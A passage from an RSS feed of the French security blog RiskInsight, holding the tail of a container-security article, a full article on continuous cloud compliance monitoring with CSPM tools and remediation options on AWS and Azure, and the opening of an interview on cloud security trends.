<li style="text-align: justify;"><strong>Sécuriser l’isolation des conteneurs :</strong> en évitant les configurations dangereuses lors du déploiement des conteneurs et via le durcissement des images</li>
<li style="text-align: justify;"><strong>Assurer la segmentation réseau :</strong> en s&rsquo;assurant de restreindre l’exposition externe du cluster, les flux au sein du cluster et en sortie du cluster</li>
<li style="text-align: justify;"><strong>Monitoring et détection :</strong> en récupérant des journaux à 3 niveaux différents et en mettant en place des scénarios de détection</li>
<li style="text-align: justify;"><strong>Sécuriser l’accès IAM :</strong> en appliquant une gestion fine de l’IAM sur le cluster ou sur le fournisseur Cloud. Cette gestion peut s’accompagner de revue périodique.</li>
</ol>
<p style="text-align: justify;"><a href="#_ftnref1" name="_ftn1"></a><a href="#_ftnref1" name="_ftn1">[1]</a> <a href="https://www.lemondeinformatique.fr/actualites/lire-l-usage-des-containers-en-production-bondit-a-84-78347.html">https://www.lemondeinformatique.fr/actualites/lire-l-usage-des-containers-en-production-bondit-a-84-78347.html</a></p>
<p style="text-align: justify;"><a href="#_ftnref2" name="_ftn1">[2]</a> <a href="https://kubernetes.io/docs/concepts/overview/components/">https://kubernetes.io/docs/concepts/overview/components/</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/01/naviguez-en-toute-securite-la-securisation-des-conteneurs-etape-par-etape/">Naviguez en toute sécurité : La sécurisation des conteneurs étape par étape </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2024/01/naviguez-en-toute-securite-la-securisation-des-conteneurs-etape-par-etape/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Conformité dans le Cloud, un nouveau paradigme</title>
		<link>https://www.riskinsight-wavestone.com/2022/10/conformite-dans-le-cloud-un-nouveau-paradigme/</link>
					<comments>https://www.riskinsight-wavestone.com/2022/10/conformite-dans-le-cloud-un-nouveau-paradigme/#respond</comments>
		
		<dc:creator><![CDATA[Etienne Lafore]]></dc:creator>
		<pubDate>Fri, 07 Oct 2022 08:00:00 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[CSPM]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=18839</guid>

					<description><![CDATA[<p>Retour d’expérience sur AWS et Azure Les erreurs de configuration dans les environnements Cloud sont encore source d’incidents majeurs et ce n’est pas près de s’arrêter. L’actualité regorge d’exemples : fuite de 1 milliard de donnés de citoyens lié à une...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/10/conformite-dans-le-cloud-un-nouveau-paradigme/">Conformité dans le Cloud, un nouveau paradigme</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h1 style="text-align: justify;" align="center">Retour d’expérience sur AWS et Azure</h1>
<p style="text-align: justify;">Les erreurs de configuration dans les environnements Cloud sont encore source d’incidents majeurs et ce n’est pas près de s’arrêter. L’actualité regorge d’exemples : <a href="https://twitter.com/cz_binance/status/1543905416748359680">fuite de 1 milliard de donnés de citoyens lié à une fuite de clé</a>,  <a href="https://lambdascientifica.com/new-office-365-phishing-campaign-used-stolen-kaspersky-amazon-ses-token-to-trick-victims/">campagne de phishing utilisant une clés AWS de Kaspersky</a>, <a href="https://gizmodo.com/iranian-chat-app-gets-its-data-wiped-out-in-a-cyberatta-1846181651">mauvaise configuration d’une base de données NoSQL</a>, <a href="https://www.darkreading.com/application-security/cloud-misconfig-exposes-3tb-sensitive-airport-data-amazon-s3-bucket">3TB de données sensibles des aéroports</a>…</p>
<p style="text-align: justify;">L’objectif de cet article est de voir comment anticiper un tel scénario en mettant en œuvre une Tour de contrôle (ou outil de supervision continue de la configuration des ressources Cloud).</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Avant toute chose, un peu de théorie sur les logs</h2>
<p style="text-align: justify;">Les logs cloud peuvent être répartis en 3 catégories :</p>
<ul style="text-align: justify;">
<li><strong>System logs</strong>: Ils sont générés par les OS et les applications hébergées en mode IaaS/CaaS. Les enjeux ne sont pas différents d’un SI classique on premise, seule l’architecture de collecte de logs peut être à adapter.</li>
</ul>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18840 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image1.png" alt="" width="1187" height="333" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image1.png 1187w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image1-437x123.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image1-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image1-768x215.png 768w" sizes="auto, (max-width: 1187px) 100vw, 1187px" /></p>
<ul style="text-align: justify;">
<li><strong>Security infrastructure admin logs : </strong>Il s’agit des logs des appliances de sécurité mais également des services PaaS de sécurité utilisés par le client et des logs des flux réseaux. Pour les appliances, là encore rien de bien nouveau, il s’agit du même composant déjà utilisé et bien connu. En revanche pour les services PaaS de sécurité et les logs réseaux, il est nécessaire de mettre en œuvre une intégration spécifique et d’adapter les scénarios de détection.</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Cloud Infra API logs : </strong>Lors de chaque call API pour créer, modifier ou supprimer une ressource, le Cloud Service Provider va générer un log.</li>
</ul>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18842 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image2.png" alt="" width="475" height="60" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image2.png 475w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image2-437x55.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image2-71x9.png 71w" sizes="auto, (max-width: 475px) 100vw, 475px" /></p>
<p style="text-align: justify;">Ces logs sont accessibles dans des services managés dédiés tels que AWS CloudTrail, AWS config ou Azure activity log</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Le délai de mise à disposition va dépendre du SLA du CSP, les logs sont généralement disponibles de quelques minutes à 15 minutes après réalisation de l’opération.</p>
<p style="text-align: justify;">Exploiter ces logs va permettre de passer d’une conformité manuelle et statique à une conformité automatique et continue :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18844 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image3.png" alt="" width="994" height="294" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image3.png 994w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image3-437x129.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image3-71x21.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image3-768x227.png 768w" sizes="auto, (max-width: 994px) 100vw, 994px" /></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Quelles options techniques pour construire une Tour de contrôle ?</h2>
<p style="text-align: justify;">Trois grandes options s’offrent à un client qui souhaiterait mettre en œuvre une tour de contrôle :</p>
<ul style="text-align: justify;">
<li><strong>Natif intégré </strong>(built-in)</li>
<li><strong>Natif personnalisé </strong>(custom)</li>
<li><strong>Cloud Security Posture Management </strong>(CSPM)</li>
</ul>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">Natif intégré (built-in)</h3>
<p style="text-align: justify;">Dans ce premier cas, les outils activés par défaut par le Cloud Service Provider, parfois gratuitement, utilisant des alertes prédéfinies pour évaluer la conformité de vos environnements et délivrer un score de sécurité sont utilisés.</p>
<p style="text-align: justify;">Par exemple Trusted Advisor sur AWS ou Microsoft Defender for Cloud sur Azure.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18848 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4.png" alt="" width="4116" height="1230" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4.png 4116w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4-437x131.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4-71x21.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4-768x230.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4-1536x459.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image4-2048x612.png 2048w" sizes="auto, (max-width: 4116px) 100vw, 4116px" />         </p>
<p style="text-align: justify;">Ces solutions natives et non-personnalisées permettent d’initier une tour de contrôle, mais elles sont cependant rapidement limitées : il s’agit d’une réponse générique à des problématiques spécifiques.</p>
<h3 style="text-align: justify;">Natif personnalisés (custom)</h3>
<p style="text-align: justify;">Les fournisseurs Cloud mettent à disposition de nombreux services permettant aux clients de construire un outil de vérification de la conformité de leur infrastructure : les outils du CSP disponibles sont personnalisés pour créer des alertes de conformité spécifiques et des tableaux de bord/KPIs personnalisés.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-18850 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image5.png" alt="" width="984" height="396" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image5.png 984w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image5-437x176.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image5-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image5-768x309.png 768w" sizes="auto, (max-width: 984px) 100vw, 984px" /></p>
<p style="text-align: justify;">Dans cette option, il est nécessaire de prévoir un projet de 10 à 40 jours hommes pour mettre en œuvre l’infrastructure de supervision, définir les 1<sup>ères</sup> alertes et construire les tableaux de bords.</p>
<p style="text-align: justify;">L’usage de plusieurs tenants, organisations ou Cloud nécessitera de définir une architecture spécifique car il n’existe pas de solution clé en main.</p>
<h3 style="text-align: justify;">CSPM : Cloud Security Posture Management</h3>
<p style="text-align: justify;">Wavestone voit un marché en plein essor. <a href="https://www.marketsandmarkets.com/Market-Reports/cloud-security-posture-management-market-71228949.html">Marketsandmarkets</a> estime que le marché devrait plus que doubler entre 2022 et 2027 en passant de 4,2 milliards de $ à 8,6 milliards de $.</p>
<p style="text-align: justify;">Les CSPM supportent nativement de nombreux Cloud providers et mettent à disposition de leurs clients de nombreux tableaux de bord basés sur les grands référentiels du marché. Le client pourra également définir facilement ses propres standards, politiques et alertes.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-18854 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image6.png" alt="" width="1115" height="526" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image6.png 1115w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image6-405x191.png 405w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image6-71x33.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image6-768x362.png 768w" sizes="auto, (max-width: 1115px) 100vw, 1115px" /></p>
<p style="text-align: justify;">Le déploiement de ce type d’outil est très simple, nécessitant que quelques jours hommes.</p>
<p style="text-align: justify;">Les coûts récurrents pourront cependant être significatifs : généralement 3 à 5% de la facture Cloud en plus des services du Cloud à activer (similaire à l’option des services natifs et personnalisés).</p>
<p style="text-align: justify;">La vitesse de détection sera également un peu moins rapide car le SLA du CSPM s’additionne à celui de génération des logs de CSP, généralement un délai de détection de 20 minutes à 1 heure.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Que doit superviser ma Tour de Contrôle ?</h2>
<p style="text-align: justify;">Le problème majeur que rencontrent les clients lors de la mise en œuvre d’un CSPM avec l’activation d’alertes proposées est la génération de dizaines voire de centaines de milliers d’alertes de criticité haute à traiter. Les équipes ne savent pas par quoi commencer et c’est bien souvent le découragement qui l’emporte. Il faut faire attention à ne pas surcharger les équipes de sécurité !</p>
<p style="text-align: justify;">Pour la mise en œuvre d’une tour de contrôle sur un SI Cloud de production, nous recommandons de déployer les contrôles de sécurité par vague de 10 à 15 à la fois. Pour cela, il faut prioriser les sujets les plus importants. Ci-dessous un exemple de priorisation :</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-18858 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image7.png" alt="" width="807" height="281" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image7.png 807w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image7-437x152.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image7-71x25.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image7-768x267.png 768w" sizes="auto, (max-width: 807px) 100vw, 807px" /></p>
<p style="text-align: justify;">Malheureusement, à toute règle ses exceptions ! Elles sont principalement liées à l’existant Cloud, à des architectures spécifiques ou des contraintes techniques. Il est donc primordial dès la conception de prévoir ce cas de figure et la gouvernance associée :</p>
<ul style="text-align: justify;">
<li>Validation : par le RSSI local et/ou le RSSI global</li>
<li>Expiration</li>
<li>Revue : décentralisée (localement ou lors d’audits globaux annuels) ou centralisée (par un suivi continu global)</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">L’utilisation de tag pour les ressources Cloud est la solution la plus simple à ce jour pour le faire &#8211; attention toutefois, certaines ressources peuvent ne pas être compatibles comme les services IAM.</p>
<p style="text-align: justify;">Quel que soit le modèle choisi, les sujets à traiter restent principalement les mêmes :</p>
<ul style="text-align: justify;">
<li>Garantir l’utilisation et l’application légitime des exceptions</li>
<li>Définir des indicateurs spécifiques sur des exceptions pour les sujets à risques du Top Management</li>
<li>Mettre en place des campagnes régulières de suivi des exceptions</li>
<li>Alerter et traiter lorsqu’une exception expire</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Comment mettre en œuvre un processus de remédiation efficace ?</h2>
<p style="text-align: justify;">La mise en œuvre d’une tour de contrôle va générer de nombreuses alertes, qu’il va falloir corriger. Trois options sont possibles : bloquer, remédier automatique ou manuellement</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-18862 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image8.png" alt="" width="924" height="274" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image8.png 924w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image8-437x130.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image8-71x21.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image8-768x228.png 768w" sizes="auto, (max-width: 924px) 100vw, 924px" /></p>
<h3 style="text-align: justify;">Refus (Mode deny)</h3>
<p style="text-align: justify;"><strong>Pourquoi remédier alors qu’il suffit de bloquer préventivement les ressources non-conformes ? </strong></p>
<p style="text-align: justify;">Avec des <a href="https://github.com/Azure/Community-Policy">Azure Policy</a> ou des <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html">AWS SCP</a>, il est possible nativement de bloquer certaines configurations et ainsi éviter la génération de nouvelles alertes.</p>
<p style="text-align: justify;">Pour les cas d’usage non couverts, il est possible de mettre en place des vérifications des templates de déploiement dans les chaines CI/CD (cela nécessite néanmoins une forte maturité).</p>
<p style="text-align: justify;">Déployer un mécanisme de refus – ou deny – sur des environnements existants est rarement implémenté car le risque de générer des mécontentements des équipes de développement est trop fort :</p>
<ul style="text-align: justify;">
<li>Les ressources existantes non conformes ne peuvent plus être modifiées</li>
<li>Cela va générer une charge supplémentaire aux équipes de développement car les habitudes doivent être changées</li>
<li>…</li>
</ul>
<h3 style="text-align: justify;">Remédiation automatique</h3>
<p style="text-align: justify;">Ici, il s’agit de corriger directement et automatiquement les configurations déviantes : attention aux effets de bord !</p>
<p style="text-align: justify;">Pour se faire, il est possible d’utiliser les services natifs des cloud provider (Azure policy ou AWS SSM Manager) ou pour des cas non supportés de développer des fonctions (AWS Lambda, Azure Function ou Azure LogicApps).</p>
<h3 style="text-align: justify;">Manuel</h3>
<p style="text-align: justify;">Il s’agit malheureusement de la solution la plus rencontrée mais aussi la plus coûteuse en ressources humaines. Les configurations déviantes sont remédiées à la main par les équipes.</p>
<p style="text-align: justify;">Pour garantir le succès d’une remédiation manuelle, il est nécessaire d’avoir un appui fort du top management pour assurer l’adhésion et la motivation des équipes.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="alignleft wp-image-18866 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image9.png" alt="" width="376" height="392" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image9.png 376w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image9-183x191.png 183w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/10/Image9-37x39.png 37w" sizes="auto, (max-width: 376px) 100vw, 376px" />La mise en œuvre d’un tableau de bord de type Cloud OWSAP mettant en lumière les priorités du moment est une bonne solution, permettant de responsabiliser chacun sur son périmètre. Chaque sujet mentionné ci-contre pouvant avoir un ou plusieurs indicateurs.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Avoir l’appui du management n’est cependant pas suffisant, il est nécessaire de connaitre le responsable de la ressource pour lui demander de faire les modifications. Dans un grand groupe international ce n’est pas chose aisée. Notre recommandation est de nommer à minima un <em>security officer </em>par compte/souscription qui devra avoir la connaissance fine des applications et des responsables des ressources.</p>
<p style="text-align: justify;">En parallèle, il est nécessaire de mettre en œuvre un programme de formation et de sensibilisation efficace. Si l’on veut minimiser le nombre d’alertes et éviter de remplir plus vite la baignoire qu’elle se vide, les équipes de développement doivent connaitre et maitriser parfaitement les exigences sécurité à respecter dans le Cloud.</p>
<p style="text-align: justify;">Pour commencer le processus de remédiation, notre conseil est de démarrer de manière centralisée avec une équipe compétente et bien dimensionnée en charge de la mise en œuvre de la tour de contrôle, mais également en charge de mobiliser et former des relais locaux, permettant à terme aux équipes locales de suivre et gérer de façon autonome la conformité sur leur périmètre.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Alerte de conformité ou alerte de sécurité ?</h2>
<p style="text-align: justify;">La majorité des entreprises considère la supervision de la conformité de leurs ressources Cloud comme n’étant pas une responsabilité des équipes SOC. Mais la frontière n’est pas si simple à définir, d’autant plus au vu du nombre d’incidents de sécurité dans le Cloud provenant d’erreurs de configuration : exposition publique d’une ressource de stockage contenant des données critiques, MFA non-configuré sur un compte admin ou encore RDP ou SSH exposés sur internet.</p>
<p style="text-align: justify;">La génération d’une alerte de sécurité au SOC permet de tirer parti des processus et outillages déjà en place, pour un traitement 24h sur 24, 7 jours sur 7 même si les ressources SOC ne sont pas expertes Cloud.</p>
<p style="text-align: justify;">Et finalement, cela sera une bonne occasion de rapprocher les sécurités Cloud et les équipes SOC pour améliorer les supervisions sécurité en l’adaptant à la réalité du cloud. Ce sujet pourra faire l’objet d’un article dédié.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/10/conformite-dans-le-cloud-un-nouveau-paradigme/">Conformité dans le Cloud, un nouveau paradigme</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2022/10/conformite-dans-le-cloud-un-nouveau-paradigme/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Les enjeux et les tendances de la sécurité du cloud, interview de Vincent Ferrie</title>
		<link>https://www.riskinsight-wavestone.com/2021/12/les-enjeux-et-les-tendances-de-la-securite-du-cloud-risk-insight/</link>
					<comments>https://www.riskinsight-wavestone.com/2021/12/les-enjeux-et-les-tendances-de-la-securite-du-cloud-risk-insight/#respond</comments>
		
		<dc:creator><![CDATA[Vincent Ferrie]]></dc:creator>
		<pubDate>Wed, 22 Dec 2021 09:47:46 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Interview]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=17468</guid>

					<description><![CDATA[<p>Vincent, peux-tu nous présenter le cloud et les enjeux de sa sécurisation ? Tout d’abord, il faut savoir que la sécurité du cloud est particulièrement différente en fonction des types de cloud et de la manière de consommer des services...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/12/les-enjeux-et-les-tendances-de-la-securite-du-cloud-risk-insight/">Les enjeux et les tendances de la sécurité du cloud, interview de Vincent Ferrie</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h1 style="text-align: justify;">Vincent, peux-tu nous présenter le cloud et les enjeux de sa sécurisation ?</h1>
<p style="text-align: justify;">Tout d’abord, il faut savoir que la sécurité du cloud est particulièrement <strong>différente en fonction des types de cloud</strong> et de la manière de consommer des services cloud. Parmi ces services, on y retrouve <strong>trois grandes catégories</strong> : SaaS (Software as a Service), PaaS (Platform as a Service) et IaaS (Infrastructure as a Service).</p>
<p style="text-align: justify;">Globalement la sécurité du cloud est bien distincte entre la partie PaaS / IaaS et la partie SaaS. Cela se matérialise par le principe de <strong>modèle de responsabilité partagée</strong>. Lors de la consommation d’un service cloud, le client aura accès à un certain périmètre avec un certain nombre de couches de données ou infrastructure suivant la catégorie de service cloud.</p>
<p style="text-align: justify;">Ce modèle permet de déterminer sur <strong>quel périmètre du service</strong> <strong>la responsabilité du fournisseur de cloud ou celle du client est engagée</strong>. La partie sécurité va elle aussi être partagée sur les couches de données sur lesquelles le client va avoir la responsabilité, cela demande donc au<strong> client de s’assurer de la sécurité</strong> de son périmètre.</p>
<p style="text-align: justify;">Dans le cadre du SaaS, pour donner un exemple, Microsoft Office 365 est un service où le client intègre ses données et n’a pas accès à toutes les couches basses du service. Le client ayant peu d’accès à la configuration du service et par conséquent sur la sécurité, il peut exiger contractuellement un niveau de sécurité auprès de son fournisseur qui aura la main sur la configuration du service.</p>
<p style="text-align: justify;">Au contraire, sur des solutions PaaS ou IaaS, le client aura accès aux couches inférieures et aura donc la responsabilité de les configurer pour se garantir de leur sécurité si elles ne sont pas gérées par le fournisseur de services. Le client peut toujours exiger certains éléments mais la responsabilité du client sera engagée sur une partie importante de la configuration et de l’utilisation sécurisée du service cloud.</p>
<p style="text-align: justify;">La sécurité du cloud soulève particulièrement un sujet contractuel puisque ce n’est pas le service du client lui-même mais celui d’un tiers. Cela amène des enjeux de sécurité à part entière et en particulier la question de ce que le client peut exiger à son fournisseur en termes de sécurité des données. Ces exigences sont amenées à évoluer en fonction de la nationalité du fournisseur.</p>
<p style="text-align: justify;">Cet enjeu de sécurité induit également des changements d’organisation. La consommation de service cloud doit impliquer de repenser l’organisation de la DSI et sa manière de fonctionner au sens large avec une inclusion de la sécurité dans les nouveaux processus. Dans cette démarche d’agilité, la sécurité doit également l’être avec des pratiques type DevSecOps.</p>
<p style="text-align: justify;"> </p>
<h1>Quelles sont les tendances du marché du cloud et de sa sécurisation ?</h1>
<p style="text-align: justify;">Il y a encore quelques années les clients étaient retissant à s’orienter vers des solutions cloud alors qu’<strong>aujourd’hui, le sujet fait consensus</strong>, <strong>il s’impose de plus en plus</strong>. Un des facteurs majeurs à son développement est la solution Office 365 de Microsoft Azure.</p>
<p style="text-align: justify;">La tendance du marché côté client est de lancer des grands programmes de migration cloud afin d’être accompagné dans cette démarche, notamment s’ils doivent faire appel à un seul ou plusieurs fournisseurs. Le sujet du multisourcing est particulièrement important en ce moment. Les clients se demandent également comment organiser leur DSI afin d’adopter des principes agiles et DevOps et ainsi réaliser leur transformation de manière intelligente. L’objectif n’est pas de réaliser du “lift and shift”, soit migrer une application on-premise existante sans effectuer de modification ou de refonte en l’intégrant directement dans le cloud.</p>
<p style="text-align: justify;">Les clients se rendent compte que <strong>la gestion du système d’information suppose des coûts très importants</strong> et que cela ne <strong>correspond pas au cœur de leur métier</strong>. L’offre cloud permet de laisser les entreprises avec cette expertise, les fournisseurs de services, réaliser la migration de ces plateformes cloud. Cela permet au client de se concentrer sur ses processus métier et <strong>réduire le time to market</strong>, le temps nécessaire pour réaliser une idée initiale et livrer un produit fini aux consommateurs.</p>
<p style="text-align: justify;">En termes de sécurité, une tendance pour les grands programmes est d’accompagner de manière sécurisée les migrations cloud. Cela passe par plusieurs éléments :</p>
<ul style="text-align: justify;">
<li>Un accompagnement sur <strong>la contractualisation</strong> <strong>avec le fournisseur cloud</strong> concernant le modèle de responsabilité partagée et ce que le client peut migrer ou non ;</li>
<li>Sur l’organisation de la DSI pour qu’elle devienne <strong>DevSecOps</strong>, approche qui permet d’intégrer la sécurité dans l&rsquo;ensemble du cycle de vie des projets, du développement à la mise en œuvre, en utilisant des méthodes flexibles et l&rsquo;approche DevOps ;</li>
<li>Pour les clients plus avancés ayant déjà entamés une migration et qui possèdent déjà un multicloud, l’objectif est de les accompagner dans l’harmonisation de ces différentes plateformes cloud et en particulier en termes de sécurité.</li>
</ul>
<p style="text-align: justify;">Du côté des éditeurs de solution de sécurité pour le cloud, la tendance est de proposer <strong>des offres multicloud</strong> mais tout en cloisonnant les différents types de cloud (IaaS, PaaS, SaaS) afin de proposer <strong>des outils spécialisés</strong>. Les outils dits CSPM (Cloud Security Posture Management) qui permettent de réaliser des contrôles de conformité sur des plateformes multicloud sont la dernière tendance du marché. Sur le volet chiffrement qui est un sujet sensible pour nos clients, la dynamique d’accompagnement du multicloud s’articule autour d’offres de service type HSMaaS ou KMSaaS qui permettent de provisionner des clés, appartenant au client – de type BYOK, utilisables d’un cloud à l’autre.</p>
<p style="text-align: justify;">D’un point de vue technologique, la tendance de fond reste le <strong>serverless</strong>. C’est un modèle de développement cloud qui permet aux développeurs de créer et d&rsquo;exécuter des applications sans avoir à gérer des serveurs. La conteneurisation et les technologies Dockers ou Kubernetes sont en cours de déploiement à grande échelle chez nos clients entrainant des grands enjeux de sécurité.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Quelles sont les difficultés que nos clients rencontrent sur les sujets abordés ? En quoi cela constitue un réel challenge ?</h1>
<p style="text-align: justify;">Les clients ayant une faible maturité sur le sujet qui sont réticents à migrer dans le cloud sont généralement les entités qui traitent des données avec un très haut niveau de confidentialité (ex : prestataire de santé, armement, etc.). Ils se demandent notamment comment ils peuvent faire confiance à une entreprise américaine. Actuellement quand on parle cloud, on parle principalement d’acteurs américains : Microsoft, Amazon et Google, qui possèdent la quasi-totalité du marché du cloud public.</p>
<p style="text-align: justify;">Pour répondre à cette interrogation, on met en avant que lorsque l’on fait appel à un fournisseur de cloud, il faut <strong>une totale confiance envers lui</strong>. L’objectif est de définir la partie contractuelle en amont de la migration du client pour s’assurer d’une total confiance envers le fournisseur sur l’accès aux données qu’on va lui transmettre. Cela peut notamment passer par une garantie contractuelle, des contrôles de sécurité, etc.  À noter que le chiffrement n’empêchera jamais le fournisseur d’accéder aux données, il faut donc s’assurer de sécuriser le cloud contre les vraies menaces.</p>
<p style="text-align: justify;">Certes, on accepte<strong> un risque infime que le fournisseur puisse accéder à ses données,</strong> puisqu’elles lui sont transmises, mais le risque reste négligeable par rapport au <strong>risque en tant que client d’effectuer une mauvaise configuration du service cloud</strong>. Ainsi, les principaux incidents de sécurité du Cloud concernent <strong>le vol de données exposées publiquement au travers de services de stockage</strong> (S3 bucket, Azure storage, etc.). La responsabilité du fournisseur n’est pas engagée dans ces cas-là puisque <strong>c’est au client de garantir la bonne configuration des services PaaS qu’il utilise afin qu’ils soient utilisés en mode privé et non exposé.</strong></p>
<p style="text-align: justify;">Cela nécessite bien évidemment un effort sur les compétences pour consommer des services cloud de manière intelligente tout en le sécurisant.</p>
<p style="text-align: justify;">Pour les clients plus avancés, <strong>le vendor locking</strong> est un sujet dominant. Si demain, le fournisseur de cloud avec qui le client collabore est amené à arrêter son activité ou est indisponible pour une durée définie, le client perd l’accès à son SI. C’est d’ailleurs pour cette raison que les clients se tournent vers des stratégies multicloud.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Comment répondre à ces problématiques et comment Wavestone peut intervenir ?</h1>
<p style="text-align: justify;">Notre conviction chez Wavestone, c’est que le cloud peut être <strong>un facilitateur pour la sécurité du SI</strong>. Une porte d’entrée pour construire un SI sur <strong>des bases saines</strong> et s’appuyer sur <strong>des technologies qui fonctionnent</strong>. Vous pouvez en profiter pour mettre la sécurité au bon endroit dès le début et une des clés pour y arriver est <strong>l’automatisation</strong>.</p>
<p style="text-align: justify;">L’automatisation doit être mise en place dans le déploiement, les infrastructures mais également la sécurité afin d’obtenir une véritable plus-value. Si le client pose <strong>les bonnes règles de sécurité</strong> et que ces règles techniques sont traduites dans les chaines d’intégration et de déploiement (CI/CD), le client aura la garantie que le déploiement ses ressources et infrastructures seront sécurisées dès leur déploiement.</p>
